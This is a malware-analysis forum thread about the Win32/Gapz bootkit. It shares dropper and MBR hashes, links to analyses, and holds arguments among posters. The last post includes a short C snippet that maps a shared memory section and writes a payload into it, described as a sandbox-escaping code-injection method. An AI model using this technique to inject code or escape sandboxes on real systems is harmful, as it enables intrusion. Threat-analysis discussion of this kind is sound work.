Bootkit: Win32/Gapz

Forum for analysis and discussion about malware.

Bootkit: Win32/Gapz

Postby R136a1 » Thu Dec 27, 2012 12:27 pm

Hi there,

ESET (Aleksandr Matrosov) released an analysis of an interesting new Bootkit:

Win32/Gapz: steps of evolution
Win32/Gapz: New Bootkit Technique

Hashes of droppers and MBR are as follows:

Win32/Gapz.A (dropper)
SHA1 hash: 1f206ea64fb3ccbe0cd7ff7972bef2592bb30c84

Win32/Gapz.A (dropper)
SHA1 hash: dff6933199137cc49c2af5f73a2d431ce2e41084

Win32/Gapz.B (dropper)
SHA1 hash: e4b64c3672e98dc78c5a356a68f89e02154ce9a6

Win32/Gapz.C (dropper)
SHA1 hash: 85fb77682705b06a77d73638df3b22ac1dbab78b

Win32/Gapz.C (MBR)
SHA1 hash: b37afc51104688ea74d279b690d8631d4c0db2ad

If someone can provide a sample, please upload. Thanks!
User avatar
R136a1
 
Posts: 215
Joined: Wed Jul 13, 2011 4:30 pm
Location: Germany
Reputation point: 136

Re: Bootkit: Win32/Gapz

Postby 360Tencent » Thu Dec 27, 2012 1:01 pm

3 droppers

Win32Gapz.zip
You do not have the required permissions to view the files attached to this post.
360Tencent
 
Posts: 116
Joined: Thu Dec 15, 2011 12:47 pm
Reputation point: 52

Re: Bootkit: Win32/Gapz

Postby kmd » Sat Dec 29, 2012 5:29 am

http://blog.eset.com/2012/12/27/win32gapz-steps-of-evolution


very "professional" analysis from twitter expert.

I. Shell_TrayWnd inject was publically available since 2009 and was initially posted on virustech.org - PUBLIC forum as PUBLIC post.
II. SetWindowLongA it call sets address of injected shellcode not KiUserApcDispatcher (wtf Matrosov?) as proflink use 82a19f2e4c9a1b4295a51df9d23af84aae848a7984c141a0c7f67b3bbb77b271 attached sample. Break on SetWindowLongA - address it points located in explorer.exe address space - dump it and look inside.
User avatar
kmd
 
Posts: 268
Joined: Mon Mar 15, 2010 4:09 am
Location: Russian Federation
Reputation point: 17

Re: Bootkit: Win32/Gapz

Postby Mut4nt » Sat Dec 29, 2012 6:58 am

This crap looks like that was made by skiddies
User avatar
Mut4nt
 
Posts: 19
Joined: Wed May 30, 2012 5:41 am
Location: Russian Federation
Reputation point: 2

Re: Bootkit: Win32/Gapz

Postby EP_X0FF » Sat Dec 29, 2012 11:04 am

Matrosov maybe not really understand what he reverse, this happens sometimes with everyone (with some people more often) but what exactly you found in this "crap" that made you think
Mut4nt wrote:looks like that was made by skiddies


:?:
Ring0 - the source of inspiration
User avatar
EP_X0FF
Global Moderator
 
Posts: 4752
Joined: Sun Mar 07, 2010 5:35 am
Location: Russian Federation
Reputation point: 562

Re: Bootkit: Win32/Gapz

Postby stds » Mon Dec 31, 2012 7:53 am

Mut4nt wrote:This crap looks like that was made by skiddies


I remember reversing one of your programs you tried to sell on hackforums, you had copy and pasted a public DKOM rootkit into a crypter, you even left in the debug strings from the original author.

I don't think you have any room to be calling anyting crap....Especially not a bootkit....
stds
 
Posts: 1
Joined: Mon Dec 31, 2012 7:47 am
Reputation point: 0

Re: Bootkit: Win32/Gapz

Postby bao » Tue Feb 12, 2013 3:17 pm

You do not have the required permissions to view the files attached to this post.
bao
 
Posts: 20
Joined: Sat Sep 22, 2012 9:27 pm
Reputation point: 0

Re: Bootkit: Win32/Gapz

Postby 0x16/7ton » Tue Mar 05, 2013 8:54 am

Hello :)
Yes maybe it is a bad article ,but i wrote her:
http://inresearching.blogspot.ru/2013/03/win32gapz-family-ring0-payload.html
Cause and effect
User avatar
0x16/7ton
 
Posts: 50
Joined: Fri Apr 20, 2012 12:59 pm
Location: Russian Federation
Reputation point: 77

Re: Bootkit: Win32/Gapz

Postby kmd » Wed Mar 20, 2013 3:48 am

User avatar
kmd
 
Posts: 268
Joined: Mon Mar 15, 2010 4:09 am
Location: Russian Federation
Reputation point: 17

Re: Bootkit: Win32/Gapz

Postby EP_X0FF » Wed Mar 20, 2013 4:01 pm

kmd wrote:Sandboxie bypassed by gapz?

http://exelab.ru/f/index.php?action=vth ... &page=1#11


The method of code injection used by Gapz is not isolated by Sandboxie 3.76 and Sandboxie 4.01 (Windows XP only), x86. As sandboxing 4.0x now uses limited accounts for sandboxed processes it is indeed more difficult to exploit - arbitrary code execution also will not work from restricted account, as GetWindowLongPtr/SetWindowLongPtr will fail. It is very boring to test but if you want you can follow steps described in that link from exelab.

Code: Select all
RtlInitUnicodeString(&usShimSection, L"\\BaseNamedObjects\\ShimSharedMemory");
InitializeObjectAttributes(&obja, &usShimSection, OBJ_CASE_INSENSITIVE, NULL, NULL);
Status = NtOpenSection(&hSection, GENERIC_WRITE, &obja);
if ( NT_SUCCESS(Status) ) {
      Status = NtMapViewOfSection(
      hSection,
      GetCurrentProcess(),
      (PVOID*)&BaseAddress,
      0,
      0,
      NULL,
      &ViewSize,
      ViewUnmap,
      0,
      PAGE_READWRITE
   );
memcpy ((BaseAddress + ViewSize) - sizeof(payload), payload, sizeof(payload));


If Sandboxie allows this, then this kind of sandboxing is one big lulz and successful explotation of this code is a question of just another exploit suitable for arbitrary code execution. Need more testing in various systems, various sections. As this is paid software I have no intentions to help author fix his ridiculous bugs or mistakes in sandbox architecture overall.

This method of arbitrary code execution was known for years before Matrosov "discovery" and we pretty sure know how and where he found it, hmm.. "itw".

If you really care about security you already use virtual machine (freeware btw), not paid half-part implemented virtualization with sleeping zerodays.
Ring0 - the source of inspiration
User avatar
EP_X0FF
Global Moderator
 
Posts: 4752
Joined: Sun Mar 07, 2010 5:35 am
Location: Russian Federation
Reputation point: 562

Next

Return to Malware

Who is online

Users browsing this forum: Google [Bot], MarcElBichon and 11 guests